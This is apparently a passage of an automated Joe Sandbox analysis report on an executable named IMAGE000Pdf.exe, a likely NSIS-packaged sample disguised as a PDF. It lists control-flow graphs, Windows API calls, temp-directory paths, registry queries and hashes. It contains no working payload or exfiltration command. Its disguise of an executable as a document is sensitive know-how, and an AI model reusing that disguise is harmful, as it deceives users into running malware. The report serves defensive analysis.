CoTaskMemFree 503->508 509 4065de 503->509 505->493 511 4065a9-4065ab 507->511 508->494 508->509 509->495 511->494 511->503
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                      • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                      • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                      • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                      • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-1230650788
                                      • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                      • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                      • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                      • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 512 405456-40546b 513 405471-405482 512->513 514 405522-405526 512->514 515 405484-405488 call 40642b 513->515 516 40548d-405499 lstrlenW 513->516 515->516 518 4054b6-4054ba 516->518 519 40549b-4054ab lstrlenW 516->519 521 4054c9-4054cd 518->521 522 4054bc-4054c3 SetWindowTextW 518->522 519->514 520 4054ad-4054b1 lstrcatW 519->520 520->518 523 405513-405515 521->523 524 4054cf-405511 SendMessageW * 3 521->524 522->521 523->514 525 405517-40551a 523->525 524->523 525->514
                                      APIs
                                      • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F923A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                      • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F923A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                      • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F923A0), ref: 004054B1
                                      • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                      • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                      • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                      • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 526 405925-405970 CreateDirectoryW 527 405972-405974 526->527 528 405976-405983 GetLastError 526->528 529 40599d-40599f 527->529 528->529 530 405985-405999 SetFileSecurityW 528->530 530->527 531 40599b GetLastError 530->531 531->529
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                      • GetLastError.KERNEL32 ref: 0040597C
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                      • GetLastError.KERNEL32 ref: 0040599B
                                      Strings
                                      • C:\Users\user\Desktop, xrefs: 00405925
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                      • API String ID: 3449924974-1729097607
                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                      • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                      • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 532 406773-406793 GetSystemDirectoryW 533 406795 532->533 534 406797-406799 532->534 533->534 535 4067aa-4067ac 534->535 536 40679b-4067a4 534->536 538 4067ad-4067e0 wsprintfW LoadLibraryExW 535->538 536->535 537 4067a6-4067a8 536->537 537->538
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                      • wsprintfW.USER32 ref: 004067C5
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                      • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                      • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 539 40324c-403263 540 403265 539->540 541 40326c-403275 539->541 540->541 542 403277 541->542 543 40327e-403283 541->543 542->543 544 403293-4032a0 call 403444 543->544 545 403285-40328e call 40345a 543->545 549 403432 544->549 550 4032a6-4032aa 544->550 545->544 551 403434-403435 549->551 552 4032b0-4032d6 GetTickCount 550->552 553 4033dd-4033df 550->553 554 40343d-403441 551->554 555 40343a 552->555 556 4032dc-4032e4 552->556 557 4033e1-4033e4 553->557 558 40341f-403422 553->558 555->554 559 4032e6 556->559 560 4032e9-4032f7 call 403444 556->560 557->555 563 4033e6 557->563 561 403424 558->561 562 403427-403430 call 403444 558->562 559->560 560->549 572 4032fd-403306 560->572 561->562 562->549 573 403437 562->573 564 4033e9-4033ef 563->564 567 4033f1 564->567 568 4033f3-403401 call 403444 564->568 567->568 568->549 576 403403-40340f call 405f96 568->576 575 40330c-40332c call 40693e 572->575 573->555 581 403332-403345 GetTickCount 575->581 582 4033d5-4033d7 575->582 583 403411-40341b 576->583 584 4033d9-4033db 576->584 585 403390-403392 581->585 586 403347-40334f 581->586 582->551 583->564 589 40341d 583->589 584->551 587 403394-403398 585->587 588 4033c9-4033cd 585->588 590 403351-403355 586->590 591 403357-403388 MulDiv wsprintfW call 405456 586->591 592 40339a-4033a1 call 405f96 587->592 593 4033af-4033ba 587->593 588->556 594 4033d3 588->594 589->555 590->585 590->591 598 40338d 591->598 599 4033a6-4033a8 592->599 597 4033bd-4033c1 593->597 594->555 597->575 600 4033c7 597->600 598->585 599->584 601 4033aa-4033ad 599->601 600->555 601->597
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                      • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                      • Opcode Fuzzy Hash: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                      • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 602 405f13-405f1f 603 405f20-405f54 GetTickCount GetTempFileNameW 602->603 604 405f63-405f65 603->604 605 405f56-405f58 603->605 607 405f5d-405f60 604->607 605->603 606 405f5a 605->606 606->607
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405F31
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\IMAGE000Pdf.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                      Strings
                                      • "C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00405F13
                                      • nsa, xrefs: 00405F20
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-2772006944
                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                      • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                      • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 608 70021777-700217b6 call 70021b5f 612 700218d6-700218d8 608->612 613 700217bc-700217c0 608->613 614 700217c2-700217c8 call 7002239e 613->614 615 700217c9-700217d6 call 700223e0 613->615 614->615 620 70021806-7002180d 615->620 621 700217d8-700217dd 615->621 622 7002180f-7002182b call 700225b5 call 700215b4 call 70021272 GlobalFree 620->622 623 7002182d-70021831 620->623 624 700217f8-700217fb 621->624 625 700217df-700217e0 621->625 649 70021885-70021889 622->649 626 70021833-7002187c call 700215c6 call 700225b5 623->626 627 7002187e-70021884 call 700225b5 623->627 624->620 628 700217fd-700217fe call 70022d83 624->628 630 700217e2-700217e3 625->630 631 700217e8-700217e9 call 70022af8 625->631 626->649 627->649 642 70021803 628->642 637 700217f0-700217f6 call 70022770 630->637 638 700217e5-700217e6 630->638 639 700217ee 631->639 648 70021805 637->648 638->620 638->631 639->642 642->648 648->620 652 700218c6-700218cd 649->652 653 7002188b-70021899 call 70022578 649->653 652->612 655 700218cf-700218d0 GlobalFree 652->655 658 700218b1-700218b8 653->658 659 7002189b-7002189e 653->659 655->612 658->652 661 700218ba-700218c5 call 7002153d 658->661 659->658 660 700218a0-700218a8 659->660 660->658 662 700218aa-700218ab FreeLibrary 660->662 661->652 662->658
                                      APIs
                                        • Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DD4
                                        • Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DD9
                                        • Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DDE
                                      • GlobalFree.KERNEL32(00000000), ref: 70021825
                                      • FreeLibrary.KERNEL32(?), ref: 700218AB
                                      • GlobalFree.KERNEL32(00000000), ref: 700218D0
                                        • Part of subcall function 7002239E: GlobalAlloc.KERNEL32(00000040,?), ref: 700223CF
                                        • Part of subcall function 70022770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700217F6,00000000), ref: 70022840
                                        • Part of subcall function 700215C6: wsprintfW.USER32 ref: 700215F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                      • String ID:
                                      • API String ID: 3962662361-3916222277
                                      • Opcode ID: 2beaaf8ecae96965096b713020965b3d8371fea7adf5c59a45d6d2d18d5e2b04
                                      • Instruction ID: 8848082d20bb060ddf0d2fa518ecca9d521afefbbc8d7f807cf56089fef5ec7f
                                      • Opcode Fuzzy Hash: 2beaaf8ecae96965096b713020965b3d8371fea7adf5c59a45d6d2d18d5e2b04
                                      • Instruction Fuzzy Hash: 90418E72400204AEDB119F70FCC5BDE37F9AB14B37F244169F9069A287DBB8A58587A0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 665 405dcb-405de6 call 4063ee call 405d6e 670 405de8-405dea 665->670 671 405dec-405df9 call 40669d 665->671 672 405e44-405e46 670->672 675 405e09-405e0d 671->675 676 405dfb-405e01 671->676 678 405e23-405e2c lstrlenW 675->678 676->670 677 405e03-405e07 676->677 677->670 677->675 679 405e2e-405e42 call 405cc3 GetFileAttributesW 678->679 680 405e0f-405e16 call 40674c 678->680 679->672 685 405e18-405e1b 680->685 686 405e1d-405e1e call 405d0f 680->686 685->670 685->686 686->678
                                      APIs
                                        • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                        • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                        • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                        • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 3248276644-263117582
                                      • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                      • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                      • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                      • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 688 4062bc-4062ee call 40625b 691 4062f0-40631e RegQueryValueExW RegCloseKey 688->691 692 40632c 688->692 691->692 693 406320-406324 691->693 694 406330-406332 692->694 693->694 695 406326-40632a 693->695 695->692 695->694
                                      APIs
                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                      • RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
